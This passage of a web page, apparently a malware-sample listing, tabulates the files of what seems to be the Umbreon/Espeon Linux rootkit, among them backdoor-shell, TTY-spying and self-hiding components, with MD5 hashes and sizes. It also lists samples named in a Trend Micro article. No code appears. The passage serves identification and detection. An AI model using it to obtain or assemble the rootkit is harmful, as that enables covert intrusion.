<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">config.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">980DEE60956A916AFC9D2997043D4887</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">967 bytes (967 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">19</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">config.h.dist</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">980DEE60956A916AFC9D2997043D4887</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">967 bytes (967 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Yes, of file config.h</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">20</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dirs.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">46B20CC7DA2BDB9ECE65E36A4F987ABC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3639 bytes (3.55 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">21</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dlsym.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">796DA079CC7E4BD7F6293136604DC07B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4088 bytes (3.99 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">22</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">exec.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1935ED453FB83A0A538224AFAAC71B21</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4033 bytes (3.94 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">23</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">getpath.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">588603EF387EB617668B00EAFDAEA393</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">183 bytes (183 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">24</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">getprocname.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F5781A9E267ED849FD4D2F5F3DFB8077</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">805 bytes (805 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">25</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">includes.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F4797AE4B2D5B3B252E0456020F58E59</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">629 bytes (629 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">26</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">kill.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C4BD132FC2FFBC84EA5103ABE6DC023D</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">555 bytes (555 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">27</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">links.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">898D73E1AC14DE657316F084AADA58A0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2274 bytes (2.22 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">local-door.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">76FC3E9E2758BAF48E1E9B442DB98BF8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">501 bytes (501 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">29</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">lpcap.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">EA6822B23FE02041BE506ED1A182E5CB</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1690 bytes (1.65 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">30</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">maps.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9BCD90BEA8D9F9F6270CF2017F9974E2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1100 bytes (1.07 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">31</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">misc.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1F9FCC5D84633931CDD77B32DB1D50D0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2728 bytes (2.66 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">32</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">netstat.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">00CF3F7E7EA92E7A954282021DD72DC4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1113 bytes (1.09 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">33</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">open.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F7EE88A523AD2477FF8EC17C9DCD7C02</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8594 bytes (8.39 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">34</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">pam.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7A947FDC0264947B2D293E1F4D69684A</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2010 bytes (1.96 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">35</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">pam_private.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2C60F925842CEB42FFD639E7C763C7B0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">12480 bytes (12.19 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">36</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">pam_vprompt.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">017FB0F736A0BC65431A25E1A9D393FE</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3826 bytes (3.74 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">37</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">passwd.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A0D183BBE86D05E3782B5B24E2C96413</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2364 bytes (2.31 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">38</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">pcap.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">FF911CA192B111BD0D9368AFACA03C46</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1295 bytes (1.26 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">39</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">procstat.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7B14E97649CD767C256D4CD6E4F8D452</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">398 bytes (398 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">40</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">procstatus.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">72ED74C03F4FAB0C1B801687BE200F06</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3303 bytes (3.23 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">41</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">readwrite.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C068ED372DEAF8E87D0133EAC0A274A8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2710 bytes (2.65 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">42</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">rename.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C36BE9C01FEADE2EF4D5EA03BD2B3C05</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">535 bytes (535 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">43</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">setgid.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5C023259F2C244193BDA394E2C0B8313</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">667 bytes (667 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">44</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">sha256.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">003D805D919B4EC621B800C6C239BAE0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">545 bytes (545 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">45</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">socket.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">348AEF06AFA259BFC4E943715DB5A00B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">579 bytes (579 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">46</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">stat.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E510EE1F78BD349E02F47A7EB001B0E3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7627 bytes (7.45 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">47</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">syslog.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7CD3273E09A6C08451DD598A0F18B570</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1497 bytes (1.46 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">48</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">umbreon.h</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F76CAC6D564DEACFC6319FA167375BA5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4316 bytes (4.21 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">49</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">unhide-funcs.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1A9F62B04319DA84EF71A1B091434C64</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4729 bytes (4.62 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">50</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cryptpass.py</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2EA92D6EC59D85474ED7A91C8518E7EC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">192 bytes (192 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">51</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">environment.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">70F467FE218E128258D7356B7CE328F1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1086 bytes (1.06 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">52</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">espeon-connect.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A574C885C450FCA048E79AD6937FED2E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">247 bytes (247 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">53</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">espeon-shell</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9EEF7E7E3C1BEE2F8591A088244BE0CB</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2167 bytes (2.12 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">54</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">espeon.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">499FF5CF81C2624B0C3B0B7E9C6D980D</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">14899 bytes (14.55 KiB)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">55</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">listen.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">69DA525AEA227BE9E4B8D59ACFF4D717</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">209 bytes (209 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">56</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">spytty.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0AB776FA8A0FBED2EF26C9933C32E97C</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1011 bytes (1011 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">57</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ssh-hidden.sh</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">AE54F343FE974302F0D31776B72D0987</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">127 bytes (127 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">58</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">unfuck.c</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">457B6E90C7FA42A7C46D464FBF1D68E2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">384 bytes (384 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">59</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">unhide-self.py</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B982597CEB7274617F286CA80864F499</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">986 bytes (986 bytes)</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; margin: 3px; padding: 4px;">60</td><td style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; margin: 3px; padding: 4px;">listen.sh</td><td style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; margin: 3px; padding: 4px;">F5BD197F34E3D0BD8EA28B182CCE7270</td><td style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; margin: 3px; padding: 4px;">233 bytes (233 bytes)</td></tr>
</tbody></table>
<div class="p1">
<br />
part 2 (those listed in the Trend Micro article)</div><div class="p1"> </div><div class="p1">
<iframe class="airtable-embed" frameborder="0" height="533" onmousewheel="" src="https://airtable.com/embed/shr31hzP0wURODxKl?backgroundColor=purpleLight&viewControls=on" style="background: transparent; border: 1px solid #ccc;" width="100%"></iframe>
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: #1c1c1c; font-family: Arial, Helvetica, sans-serif; margin: 0px auto; text-align: center;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: #048b16; color: white; text-align: left;">#</th><th style="background-color: #048b16; color: white; text-align: left;">File Name</th><th style="background-color: #048b16; color: white; text-align: left;">Hash Value</th><th style="background-color: #048b16; color: white; text-align: left;">File Size (on Disk)</th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28ac</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">A47E38464754289C0F4A55ED7BB55648</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9375 bytes (9.16 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">F9BA2429EAE5471ACDE820102C5B8159</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">7512 bytes (7.34 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0AB776FA8A0FBED2EF26C9933C32E97C</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">1011 bytes (1011 bytes)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">4</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">0ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ff</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">B982597CEB7274617F286CA80864F499</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">986 bytes (986 bytes)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">5</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e8670</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9EEF7E7E3C1BEE2F8591A088244BE0CB</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2167 bytes (2.12 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">B4746BB5E697F23A5842ABCAED36C914</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6149 bytes (6 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">4fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">D0D97899131C29B3EC9AE89A6D49A23E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">65160 bytes (63.63 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">8752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">E7E82D29DFB1FC484ED277C702187818</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">55564 bytes (54.26 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b73088522</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">2B1863ACDC0068ED5D50590CF792DF05</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">7664 bytes (7.48 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">10</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">A977F68C59040E40A822C384D1CEDEB6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">176 bytes (176 bytes)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">11</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809b</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">DF320ED7EE6CCF9F979AEFE451877FFC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">26 bytes (26 bytes)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">12</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa4525</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">84D552B5D22E40BDA23E6587B1BC532D</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">6852 bytes (6.69 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">13</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">087DD79515D37F7ADA78FF5793A42B7B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">11184 bytes (10.92 KiB)</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">14</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">BBEB18C0C3E038747C78FCAB3E0444E3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px; text-align: left;">71940 bytes (70.25 KiB)</td></tr>
</tbody></table>
</div>
<div class="p1">
